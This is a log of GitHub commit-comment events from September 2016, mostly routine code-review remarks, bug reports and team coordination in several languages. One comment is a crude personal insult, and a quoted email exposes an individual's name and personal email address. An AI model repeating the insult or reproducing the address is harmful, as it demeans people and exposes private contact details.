{"id":"4578396366","type":"CommitCommentEvent","actor":{"login":"hughperkins"},"repo":{"name":"torch/torch7"},"payload":{"comment":{"id":19065940,"position":null,"line":null,"path":null,"commit_id":"c6554c0c394d50a74e63bb106343c9f36ddfd41a","created_at":"2016-09-17T18:12:58Z","updated_at":"2016-09-17T18:12:58Z","body":"Ah, interesting. I was just about to ask why we install `sys` after installing `torch`, in `distro/install.sh` :-)  Do you mind if I ask:\r\n- why was sys a dependency before?\r\n- why can we remove it now?\r\n- implications of removing it?\r\n\r\n(Since I'm using torhc as of ~17th Februrary, and it still has a `sys` dependency)"}},"created_at":"2016-09-17T18:12:58Z"}
{"id":"4578396436","type":"CommitCommentEvent","actor":{"login":"patdesorcy"},"repo":{"name":"FormidableLabs/react-game-kit"},"payload":{"comment":{"id":19065941,"position":null,"line":null,"path":null,"commit_id":"1d8c6c3a32f041a1d2088aa56ca3c3128f74d49c","created_at":"2016-09-17T18:13:01Z","updated_at":"2016-09-17T18:13:01Z","body":"committed by dijonkitchen ⋅ 1d8c6c3a"}},"created_at":"2016-09-17T18:13:01Z"}
{"id":"4578397036","type":"CommitCommentEvent","actor":{"login":"TheOrangeOne"},"repo":{"name":"TheOrangeOne/DANK"},"payload":{"comment":{"id":19065943,"position":null,"line":null,"path":null,"commit_id":"3078d03b37bf58f52ed48e447dce8faa4e433270","created_at":"2016-09-17T18:13:22Z","updated_at":"2016-09-17T18:13:22Z","body":"good commit! 13/10"}},"created_at":"2016-09-17T18:13:22Z"}
{"id":"4578398455","type":"CommitCommentEvent","actor":{"login":"picesszaza"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19065948,"position":null,"line":null,"path":null,"commit_id":"3f93339e837f953a1f985d2cd9a8af45beb28412","created_at":"2016-09-17T18:14:15Z","updated_at":"2016-09-17T18:14:15Z","body":"ตรงนี้ ถ้า server 0 ไอริชเข้าได้ครับ แต่ถ้า เป็น server 1 ชาออส เข้าไมได้ server 4 ทอร์ก้อเข้าไม่ได้ \r\n(หลุดตอนเลือกเซิฟ) ขอบคุณมากครับ"}},"created_at":"2016-09-17T18:14:15Z"}
{"id":"4578400536","type":"CommitCommentEvent","actor":{"login":"schnittstabil"},"repo":{"name":"sindresorhus/pify"},"payload":{"comment":{"id":19065954,"position":null,"line":null,"path":null,"commit_id":"550f5ec692368eb86f2ae22a23fe64612de9c1c5","created_at":"2016-09-17T18:15:35Z","updated_at":"2016-09-17T18:15:35Z","body":":+1: "}},"created_at":"2016-09-17T18:15:35Z"}
{"id":"4578402280","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19065966,"position":9,"line":9,"path":"src/am/aca/mediaPlayer/util/PathUtil.java","commit_id":"2e70670f443a6ea959345b988f1b9e25e2810f71","created_at":"2016-09-17T18:16:50Z","updated_at":"2016-09-17T18:16:50Z","body":"Es class@ qez petq chi. U vonc tesa voch mi tegh du iran ches oktagorcel.\r\nAshxati cragrit mej avelnord coder chpahes. Inch@ petq chi jnji."}},"created_at":"2016-09-17T18:16:50Z"}
{"id":"4578403071","type":"CommitCommentEvent","actor":{"login":"BrunoLemosCoutinho"},"repo":{"name":"xerpi/ds4pair_wii"},"payload":{"comment":{"id":19065967,"position":null,"line":null,"path":null,"commit_id":"214c431e48d6b38e9c5fb6ac409d1fcb83d84f11","created_at":"2016-09-17T18:17:23Z","updated_at":"2016-09-17T18:17:23Z","body":"Hi,\r\nI used your apps that you´ve posted here http://www.ps3hax.net/showthread.php?t=78431\r\nI runned the ds4pair_wii flawlessly. When running Ds4wiibt, everything seems ok, and the app recognizes my DS4´s commands...\r\n\r\nWell, but when I try to exit the app, it cames another screen saying \"Exception (DSI) occured!\", followed by a lot of hexadecimals numbers. Then the apps seems stuck and I have to turn off the console.\r\n\r\nAs turning on again, I go to Nintendont app, press the DS4 Home button, and its light turns on solid, which I suppose there is a connection between Wii and DS4. But nothing happens when a press any button on DS4. I´ve already put the DS4 controller.ini on SD root folder...\r\n\r\nSo, what is happenig? Could you help me to figure out how to make it work fine? It would be amazing to play my Gamecube games wirelessly with my DS4 controller. \r\n\r\nPs: at Ds4wiibt, some parameters get changing quickly, until the app freezes in random moment"}},"created_at":"2016-09-17T18:17:23Z"}
{"id":"4578403288","type":"CommitCommentEvent","actor":{"login":"Stevenjohnlally"},"repo":{"name":"Stevenjohnlally/TeamDonerMod"},"payload":{"comment":{"id":19065970,"position":null,"line":null,"path":null,"commit_id":"2e5acce463933e8d257056dd8da848728708576d","created_at":"2016-09-17T18:17:32Z","updated_at":"2016-09-17T18:17:32Z","body":"This commit fixes #4 "}},"created_at":"2016-09-17T18:17:32Z"}
{"id":"4578404273","type":"CommitCommentEvent","actor":{"login":"vincent-legoll"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19065972,"position":null,"line":null,"path":null,"commit_id":"6ec8ab226952240de5c8cf54ef7681d5d159aa8e","created_at":"2016-09-17T18:18:08Z","updated_at":"2016-09-17T18:18:08Z","body":"Sorry about that, would it be good to enforce with a git hook or something like that ?"}},"created_at":"2016-09-17T18:18:08Z"}
{"id":"4578404703","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19065974,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-17T18:18:26Z","updated_at":"2016-09-17T18:18:26Z","body":"My last email I said server when it has a mix of server an client stuff. I\nmeant to say client side but the server side will have the read_board()\nupdate_board() and return messages. (reading the lab assignment can help\nclarify my explanation if I mis-spoke on client vs server side)The data\nsent between server and client will probably be read in as a string which\ncan easily be cast to whatever we need. If we have to it would not be\ndifficult to change it to a char, byte, or even a bit. I am working on the\nclient side a little now just setting up a beginning structure. I didn't\nwant anyone to get too far then try to add a main() method and worry about\nthe proper indentation to keep python happy. If you have not struggled with\nit like I did a long time ago python uses indentation for the blocks of\ncode instead of curly braces and the indentation is 4 spaces, some windows\nmachines will have tab set at 5 and it fucks everything up. So be sure\nindentations for blocks of code are 4 spaces. I am making a main method for\neach class and to make it easier we should make methods for read_board(),\nupdate_board(), etc Python does not use bumpy case or camel case but I\ndon't really care what we use, python it is just convention and not a rule\nto name the main method with a capitol letter, all other methods and\nvariables are lower_case_with_underscores.(in case you were wondering about\nmy naming in the previous email)\nI think a 2d array would be easier to maintain for the board and setting it\nup could use two nested for loops, one for row, one for column and read in\nthe text file a char or line at a time. I am open to any suggestions.\nJust a reminder when working with the remote git repo, be sure to do a pull\nbefore you start editing code to be sure you have the latest copy and be\nsure to push regularly so we all stay current.\n\nThanks\nDavid\n\nOn Sat, Sep 17, 2016 at 7:31 AM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> I was thinking of having something modular(more methods) that could be\n> modified easier and easier for multiple people to work on. Server side\n> would have a main that  would start by reading the command line arguments,\n> assigning arguments to variables, build board from incomming text file\n> argument(board could be a 2d array), open network conneciton, then read the\n> board at x,y coords and return message. read_boardd(x,y){ return hit, miss,\n> sink, repeat} hit miss sink repeat could be a string a char a bit, doesn't\n> really matter. update_board(x,y){record shot on board at x,y)\n> return_message(message){send http reply to client} There could be a\n> variable named message, message = read_board(x,y) return_message(message){\n> if message = hit return proper http reply if message = miss return proper\n> http reply, if message...} The http replies could be separate methods too.\n> Someone could work on building the 2d array from the text file. Someone\n> could work on read_board() and update_board(). Someone could work on return\n> message and http stuff. Once we get going people ca fill in where help is\n> needed. I don't mind what part I work on, I thought I could start on the\n> htttp and network stuff.\n> What do you guys want to work on?  I will start on something an change or\n> keep working on it once I hear back.\n>\n> David\n>\n> On Fri, Sep 16, 2016 at 7:13 PM, tyler-sassaman <notifications@github.com>\n> wrote:\n>\n>> I uploaded a file with some chunks of code that are a start at a few\n>> things, I am just not sure how to interface them with the rest of the\n>> program. I think the easiest way to process a message is to parse the\n>> message and call process with only the x and y values. How this would be\n>> done I am not sure. I think a 2d array is the easiest way to maintain the\n>> board and issue responses, and for each board query we can just create a\n>> new board.txt file from the array.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19062282>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AE8DG3Wt-M3m5PLng_3G-UL1D-aUKImWks5qqz6_gaJpZM4J_dYG>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-17T18:18:26Z"}
{"id":"4578404957","type":"CommitCommentEvent","actor":{"login":"Melonhead55"},"repo":{"name":"dnschneid/crouton"},"payload":{"comment":{"id":19065975,"position":null,"line":null,"path":null,"commit_id":"2909da0fd8f2fcce255aa4169dedc5c4c20e1d0b","created_at":"2016-09-17T18:18:35Z","updated_at":"2016-09-17T18:18:35Z","body":"How would I apply this change to an existing crouton install? I'm pretty new to using github, so forgive the obvious questions."}},"created_at":"2016-09-17T18:18:35Z"}
{"id":"4578405016","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19065976,"position":5,"line":5,"path":"src/am/aca/mediaPlayer/repository/interfaces/SongWrapperInterface.java","commit_id":"2e70670f443a6ea959345b988f1b9e25e2810f71","created_at":"2016-09-17T18:18:39Z","updated_at":"2016-09-17T18:18:39Z","body":"es method@ incha anum?\r\ninchia user@ boolean tipi?\r\n"}},"created_at":"2016-09-17T18:18:39Z"}
{"id":"4578405577","type":"CommitCommentEvent","actor":{"login":"krsyoung"},"repo":{"name":"krsyoung/simple_calendar"},"payload":{"comment":{"id":19065978,"position":21,"line":81,"path":"lib/simple_calendar/calendar.rb","commit_id":"78673ad1975367ca1d28fa91199ca7f1b8a9cb52","created_at":"2016-09-17T18:19:00Z","updated_at":"2016-09-17T18:19:00Z","body":"Beautiful!  This is why your code looks so nice, cleaned up a big chunk of mess.  Just push and still passing the tests!"}},"created_at":"2016-09-17T18:19:00Z"}
{"id":"4578407349","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"thelounge/lounge"},"payload":{"comment":{"id":19065982,"position":null,"line":null,"path":null,"commit_id":"c090ab065f09b23408790d2d58cbf38ed0442a7b","created_at":"2016-09-17T18:20:13Z","updated_at":"2016-09-17T18:20:13Z","body":"![](https://marlamin.com/gifs/g/shaggyparrot2.gif)"}},"created_at":"2016-09-17T18:20:13Z"}
{"id":"4578407895","type":"CommitCommentEvent","actor":{"login":"gjhoon"},"repo":{"name":"likelion-kau1/malangKau"},"payload":{"comment":{"id":19065986,"position":null,"line":null,"path":null,"commit_id":"33fa9df65c1591d74d6fd6bc1dab85f8ad7e37eb","created_at":"2016-09-17T18:20:36Z","updated_at":"2016-09-17T18:20:36Z","body":"ㄷㄷㄷ 얼른 만들고 다른 언어로 갈아타야겠어요... ㅠㅠㅠ"}},"created_at":"2016-09-17T18:20:36Z"}
{"id":"4578408288","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19065989,"position":11,"line":11,"path":"src/am/aca/mediaPlayer/repository/interfaces/PlayListRepositoryInterface.java","commit_id":"2e70670f443a6ea959345b988f1b9e25e2810f71","created_at":"2016-09-17T18:20:53Z","updated_at":"2016-09-17T18:20:53Z","body":"ashxati Exception ner oktagorces\r\norinak \r\n\r\npublic void removeSong(SongWrapper song) throws InvalidArgumentException;\r\nete porcem song jnjem vor@ goyutyun chuni bazayum et depqum exception qci."}},"created_at":"2016-09-17T18:20:53Z"}
{"id":"4578408760","type":"CommitCommentEvent","actor":{"login":"nismotue1"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19065991,"position":null,"line":null,"path":null,"commit_id":"3f93339e837f953a1f985d2cd9a8af45beb28412","created_at":"2016-09-17T18:21:13Z","updated_at":"2016-09-17T18:21:13Z","body":"คงต้อง fix char serv กับ map serv "}},"created_at":"2016-09-17T18:21:13Z"}
{"id":"4578408941","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19065993,"position":5,"line":5,"path":"src/am/aca/mediaPlayer/repository/interfaces/ExportRepositoryInterface.java","commit_id":"2e70670f443a6ea959345b988f1b9e25e2810f71","created_at":"2016-09-17T18:21:23Z","updated_at":"2016-09-17T18:21:23Z","body":"es inch interfacea? inchia datark?"}},"created_at":"2016-09-17T18:21:23Z"}
{"id":"4578410190","type":"CommitCommentEvent","actor":{"login":"ArmLil"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19066001,"position":5,"line":5,"path":"src/am/aca/mediaPlayer/repository/interfaces/SongWrapperInterface.java","commit_id":"2e70670f443a6ea959345b988f1b9e25e2810f71","created_at":"2016-09-17T18:22:14Z","updated_at":"2016-09-17T18:22:14Z","body":"Hov , vonc vor te hinn es nayum .\n\n\n>Суббота, 17 сентября 2016, 22:18 +04:00 от hovhanneskhalatyan <notifications@github.com>:\n>\n>es method@ incha anum?\n>inchia user@ boolean tipi?\n>—\n>You are receiving this because you authored the thread.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n\n"}},"created_at":"2016-09-17T18:22:14Z"}
{"id":"4578412442","type":"CommitCommentEvent","actor":{"login":"joshuamking"},"repo":{"name":"HackGSU/mobile-android"},"payload":{"comment":{"id":19066011,"position":null,"line":null,"path":null,"commit_id":"cf529d4c913cf60643afe770dcf6d29ffbe71bbf","created_at":"2016-09-17T18:23:48Z","updated_at":"2016-09-17T18:23:48Z","body":"Haha!"}},"created_at":"2016-09-17T18:23:48Z"}
{"id":"4578412690","type":"CommitCommentEvent","actor":{"login":"ArmLil"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19066012,"position":5,"line":5,"path":"src/am/aca/mediaPlayer/repository/interfaces/ExportRepositoryInterface.java","commit_id":"2e70670f443a6ea959345b988f1b9e25e2810f71","created_at":"2016-09-17T18:23:59Z","updated_at":"2016-09-17T18:23:59Z","body":"https://github.com/ArmLil/mediaplayer  \n\n\nEs linkov stugi, noric hin gracn es nayum.\n\n\n>Суббота, 17 сентября 2016, 22:21 +04:00 от hovhanneskhalatyan <notifications@github.com>:\n>\n>es inch interfacea? inchia datark?\n>—\n>You are receiving this because you authored the thread.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n\n"}},"created_at":"2016-09-17T18:23:59Z"}
{"id":"4578413161","type":"CommitCommentEvent","actor":{"login":"thomasbeta"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066016,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T18:24:18Z","updated_at":"2016-09-17T18:24:18Z","body":"📚📚📚 "}},"created_at":"2016-09-17T18:24:18Z"}
{"id":"4578413908","type":"CommitCommentEvent","actor":{"login":"emperorstarfinder"},"repo":{"name":"Virtual-Universe/Virtual-Dev"},"payload":{"comment":{"id":19066017,"position":null,"line":null,"path":null,"commit_id":"8e347e1ec63c4d5316fb033f8f61b8bddc83900a","created_at":"2016-09-17T18:24:46Z","updated_at":"2016-09-17T18:24:46Z","body":"The fix is just to have people use Singularity 1.8.6 or the version of Alchemy just before 4.0.1. This is a temporary solution while we sort out the problem and implement a permanent fix which should not take very long.  Likely by the end of the week as we have to test internally to be sure it works."}},"created_at":"2016-09-17T18:24:46Z"}
{"id":"4578413943","type":"CommitCommentEvent","actor":{"login":"excid3"},"repo":{"name":"krsyoung/simple_calendar"},"payload":{"comment":{"id":19066018,"position":21,"line":81,"path":"lib/simple_calendar/calendar.rb","commit_id":"78673ad1975367ca1d28fa91199ca7f1b8a9cb52","created_at":"2016-09-17T18:24:48Z","updated_at":"2016-09-17T18:24:48Z","body":"This is wonderfully simple now. 👍 👍 Want to send me a PR?"}},"created_at":"2016-09-17T18:24:48Z"}
{"id":"4578414808","type":"CommitCommentEvent","actor":{"login":"arnaud-morvan"},"repo":{"name":"volaya/QGIS"},"payload":{"comment":{"id":19066020,"position":728,"line":728,"path":"python/plugins/processing/gui/wrappers.py","commit_id":"8a22cf413377facf4ffad828f71594875b88c5e6","created_at":"2016-09-17T18:25:21Z","updated_at":"2016-09-17T18:25:21Z","body":"Do you know why we use a QLineEdit here ?"}},"created_at":"2016-09-17T18:25:21Z"}
{"id":"4578415422","type":"CommitCommentEvent","actor":{"login":"staticfloat"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19066025,"position":null,"line":null,"path":null,"commit_id":"45bc17d41b40f271dd5ebb2357e7f3564f969007","created_at":"2016-09-17T18:25:44Z","updated_at":"2016-09-17T18:25:44Z","body":"I've [added `cmake`](https://github.com/staticfloat/homebrew-julia/commit/e61f95314e8247ccbabf1846bf6b2e268d633361) to the list of build requirements for julia, so manually installing `cmake` shouldn't be an issue anymore."}},"created_at":"2016-09-17T18:25:44Z"}
{"id":"4578416659","type":"CommitCommentEvent","actor":{"login":"picesszaza"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19066034,"position":null,"line":null,"path":null,"commit_id":"3f93339e837f953a1f985d2cd9a8af45beb28412","created_at":"2016-09-17T18:26:36Z","updated_at":"2016-09-17T18:26:36Z","body":"@nismotue1 เจอปัญหา หลุด Packet Parser: Unknown switch: 0100 บ้างไหมครับ"}},"created_at":"2016-09-17T18:26:36Z"}
{"id":"4578418636","type":"CommitCommentEvent","actor":{"login":"jakebrinkmann"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066042,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T18:28:03Z","updated_at":"2016-09-17T18:28:03Z","body":"Haha, do you like my scheme to start the git commit message with:\r\n\r\n :dragon: an (incompatible) API change\r\n :hamster: change related to BuiLDing Project\r\n :bug: BUG fix\r\n :warning: DEPrecate something, or remove a deprecated object\r\n :horse: DEVelopment tool or utility\r\n :books: DOCumentation\r\n :boom: ENHancement\r\n :scissors: MAINTenance commit (refactoring, typos, etc.)\r\n :dizzy: REVert an earlier commit\r\n :sparkles: STYle fix (whitespace, PEP8)\r\n :umbrella: addition or modification of TeSTs\r\n :shipit: related to RELeasing Project\r\n\r\n\r\nBased off the development workflow of [Python-Numpy](http://docs.scipy.org/doc/numpy-1.10.1/dev/gitwash/development_workflow.html)\r\n"}},"created_at":"2016-09-17T18:28:03Z"}
{"id":"4578420451","type":"CommitCommentEvent","actor":{"login":"arnaud-morvan"},"repo":{"name":"volaya/QGIS"},"payload":{"comment":{"id":19066047,"position":78,"line":78,"path":"python/plugins/processing/gui/wrappers.py","commit_id":"8a22cf413377facf4ffad828f71594875b88c5e6","created_at":"2016-09-17T18:29:20Z","updated_at":"2016-09-17T18:29:20Z","body":"IMHO valueChanged should be good as we already have value() and setValue(value)"}},"created_at":"2016-09-17T18:29:20Z"}
{"id":"4578422904","type":"CommitCommentEvent","actor":{"login":"firesmoge"},"repo":{"name":"firesmoge/branch-practice"},"payload":{"comment":{"id":19066055,"position":2,"line":2,"path":"README.md","commit_id":"8c0445a6df5a383baf46d386ed0af980d8b3a9d8","created_at":"2016-09-17T18:30:45Z","updated_at":"2016-09-17T18:30:45Z","body":"good "}},"created_at":"2016-09-17T18:30:45Z"}
{"id":"4578425040","type":"CommitCommentEvent","actor":{"login":"Bartuz"},"repo":{"name":"CucumisSativus/ddd_crm"},"payload":{"comment":{"id":19066059,"position":5,"line":9,"path":"app/models/user.rb","commit_id":"956991e36afea1f0d466e096bf603ecb18bd79dd","created_at":"2016-09-17T18:31:59Z","updated_at":"2016-09-17T18:31:59Z","body":"No właśnie przeglądałem repo pod względem repos/queries/cmd object i bardzo ładnie to wygląda, tylko chyba ciężko to docenić w tak małym projekcie. Ale świetna robota, naprawdę dobry kawałek kodu, inspirujący. Podałbyś jakieś źródła (blogi, książki), które Ci towarzyszyły w tworzeniu tego projektu? "}},"created_at":"2016-09-17T18:31:59Z"}
{"id":"4578427216","type":"CommitCommentEvent","actor":{"login":"thomasbeta"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066064,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T18:33:17Z","updated_at":"2016-09-17T18:33:17Z","body":"OOOO ya I'm all about that"}},"created_at":"2016-09-17T18:33:17Z"}
{"id":"4578431204","type":"CommitCommentEvent","actor":{"login":"thomasbeta"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066076,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T18:35:42Z","updated_at":"2016-09-17T18:35:42Z","body":"Been working on some Kool AD inspired messages lately \r\n![screen shot 2016-09-17 at 1 34 53 pm](https://cloud.githubusercontent.com/assets/8434548/18610205/8fdc34b0-7cdb-11e6-8dbe-0e745e7032b2.png)\r\n\r\n"}},"created_at":"2016-09-17T18:35:42Z"}
{"id":"4578437814","type":"CommitCommentEvent","actor":{"login":"yguoogo"},"repo":{"name":"yguoogo/LibRoom_Booking"},"payload":{"comment":{"id":19066097,"position":null,"line":null,"path":null,"commit_id":"0874f3257f4a25581f1f9704c35cac52f76d23d9","created_at":"2016-09-17T18:39:44Z","updated_at":"2016-09-17T18:39:44Z","body":"OK"}},"created_at":"2016-09-17T18:39:44Z"}
{"id":"4578440944","type":"CommitCommentEvent","actor":{"login":"StormWulf"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19066103,"position":null,"line":null,"path":null,"commit_id":"30f7d5f2f46beb3d1210929e082fc083ab23d8d8","created_at":"2016-09-17T18:41:48Z","updated_at":"2016-09-17T18:41:48Z","body":"Edited by OneShot"}},"created_at":"2016-09-17T18:41:48Z"}
{"id":"4578441470","type":"CommitCommentEvent","actor":{"login":"drna3r"},"repo":{"name":"drna3r/IS-Dashboard"},"payload":{"comment":{"id":19066104,"position":42,"line":794,"path":"index.php","commit_id":"c9e2d39bbeeadcb9c340f9a81aa4dc547b3e660b","created_at":"2016-09-17T18:42:11Z","updated_at":"2016-09-17T18:42:11Z","body":"چرا محدودیت 5 تا رو قرار دادی؟"}},"created_at":"2016-09-17T18:42:11Z"}
{"id":"4578441477","type":"CommitCommentEvent","actor":{"login":"CantStumpTheTrump"},"repo":{"name":"LandonPowell/ThankYou.c"},"payload":{"comment":{"id":19066105,"position":null,"line":null,"path":null,"commit_id":"b36c192e23cad050ea04422a791fea07c50fa9c6","created_at":"2016-09-17T18:42:11Z","updated_at":"2016-09-17T18:42:11Z","body":"Ur a fuking sys.male"}},"created_at":"2016-09-17T18:42:11Z"}
{"id":"4578442019","type":"CommitCommentEvent","actor":{"login":"sunsettrack4"},"repo":{"name":"sunsettrack4/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19066106,"position":null,"line":null,"path":null,"commit_id":"5d5f0aa893b7a8db309d3627b6c4abf050f7de27","created_at":"2016-09-17T18:42:32Z","updated_at":"2016-09-17T18:42:32Z","body":"Credits: ZaneZam for zzmoove governor implementation + gcc fixes"}},"created_at":"2016-09-17T18:42:32Z"}
{"id":"4578442116","type":"CommitCommentEvent","actor":{"login":"jakebrinkmann"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066108,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T18:42:36Z","updated_at":"2016-09-17T18:42:36Z","body":":laughing: poetic regex :+1:\n\nI cloned log this morning and was very curious,  when I saw \"cop now, only 100 bones\" I figured you were in a jam sesh"}},"created_at":"2016-09-17T18:42:36Z"}
{"id":"4578443597","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":19066112,"position":null,"line":null,"path":null,"commit_id":"9b0ffc55b7b86f0aff203950bdb141e94d24cedc","created_at":"2016-09-17T18:43:23Z","updated_at":"2016-09-17T18:43:23Z","body":"Yes, this was problem for me before so i sometimes had to disable this to debug ;-)"}},"created_at":"2016-09-17T18:43:23Z"}
{"id":"4578443910","type":"CommitCommentEvent","actor":{"login":"amatveevprog"},"repo":{"name":"amatveevprog/TeaTimeShopCore"},"payload":{"comment":{"id":19066114,"position":null,"line":null,"path":null,"commit_id":"18222a0802ba184017dfb2daf86b437792338100","created_at":"2016-09-17T18:43:32Z","updated_at":"2016-09-17T18:43:32Z","body":"nice"}},"created_at":"2016-09-17T18:43:32Z"}
{"id":"4578445101","type":"CommitCommentEvent","actor":{"login":"StormWulf"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19066117,"position":null,"line":null,"path":null,"commit_id":"10dc19eed42c710cac3362c7b9e64af545a16c46","created_at":"2016-09-17T18:44:01Z","updated_at":"2016-09-17T18:44:01Z","body":"Edited by Diablade Zat"}},"created_at":"2016-09-17T18:44:01Z"}
{"id":"4578446051","type":"CommitCommentEvent","actor":{"login":"StormWulf"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19066118,"position":null,"line":null,"path":null,"commit_id":"a74f270a05f81bf427dd9dee13cad992ee76e9c8","created_at":"2016-09-17T18:44:24Z","updated_at":"2016-09-17T18:44:24Z","body":"Edited by OneShot"}},"created_at":"2016-09-17T18:44:24Z"}
{"id":"4578446331","type":"CommitCommentEvent","actor":{"login":"cedarlug"},"repo":{"name":"GameServerManagers/LinuxGSM"},"payload":{"comment":{"id":19066121,"position":5,"line":12,"path":"7DaysToDie/sdtdserver","commit_id":"2a5896488722877ee17c761b869c23ab42c89309","created_at":"2016-09-17T18:44:31Z","updated_at":"2016-09-17T18:44:31Z","body":"Version downgraded."}},"created_at":"2016-09-17T18:44:31Z"}
{"id":"4578446931","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":19066123,"position":null,"line":null,"path":null,"commit_id":"e5fa7faabb0461adcf5f8434630b3749993d301e","created_at":"2016-09-17T18:44:51Z","updated_at":"2016-09-17T18:44:51Z","body":"Nicly done my friend "}},"created_at":"2016-09-17T18:44:51Z"}
{"id":"4578446951","type":"CommitCommentEvent","actor":{"login":"jcisneros24"},"repo":{"name":"jcisneros24/sistemaVentas"},"payload":{"comment":{"id":19066124,"position":null,"line":null,"path":null,"commit_id":"c78defaea6810e1b6cd140452ab4d7536f151b28","created_at":"2016-09-17T18:44:52Z","updated_at":"2016-09-17T18:44:52Z","body":"version 1"}},"created_at":"2016-09-17T18:44:52Z"}
{"id":"4578447084","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19066125,"position":5,"line":5,"path":"src/am/aca/mediaPlayer/repository/interfaces/SongWrapperInterface.java","commit_id":"2e70670f443a6ea959345b988f1b9e25e2810f71","created_at":"2016-09-17T18:44:56Z","updated_at":"2016-09-17T18:44:56Z","body":"ha ok esa mius commit@ knayem\n\nOn Sat, Sep 17, 2016 at 10:22 PM, ArmLil <notifications@github.com> wrote:\n\n> Hov , vonc vor te hinn es nayum .\n>\n>\n> >Суббота, 17 сентября 2016, 22:18 +04:00 от hovhanneskhalatyan <\n> notifications@github.com>:\n> >\n> >es method@ incha anum?\n> >inchia user@ boolean tipi?\n> >—\n> >You are receiving this because you authored the thread.\n> >Reply to this email directly, view it on GitHub , or mute the thread .\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ArmLil/mediaplayer/commit/2e70670f443a6ea959345b988f1b9e25e2810f71#commitcomment-19066001>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT8GUuQ_XsGkPTAjEaCIL60mXFEBZa0Nks5qrC_WgaJpZM4J_qvu>\n> .\n>\n"}},"created_at":"2016-09-17T18:44:56Z"}
{"id":"4578447980","type":"CommitCommentEvent","actor":{"login":"gigabit101"},"repo":{"name":"gigabit101/QuantumStorage"},"payload":{"comment":{"id":19066130,"position":null,"line":null,"path":null,"commit_id":"d7c9ec875926aabc971c08969a6ea1368814e878","created_at":"2016-09-17T18:45:31Z","updated_at":"2016-09-17T18:45:31Z","body":"Yeah was my derp no need to push a fix for a version number so\n..\n\nOn 17 Sep 2016 5:09 p.m., \"psychofad\" <notifications@github.com> wrote:\n\n> version numbering goes down now? :P\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gigabit101/QuantumStorage/commit/d7c9ec875926aabc971c08969a6ea1368814e878#commitcomment-19065253>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFWvTpHDBZM5-PLmdIqttgjEEvWZKqgiks5qrBCngaJpZM4J_ot7>\n> .\n>\n"}},"created_at":"2016-09-17T18:45:31Z"}
{"id":"4578448686","type":"CommitCommentEvent","actor":{"login":"thomasbeta"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066136,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T18:45:58Z","updated_at":"2016-09-17T18:45:58Z","body":"Haha 🙏🏻 alwayz"}},"created_at":"2016-09-17T18:45:58Z"}
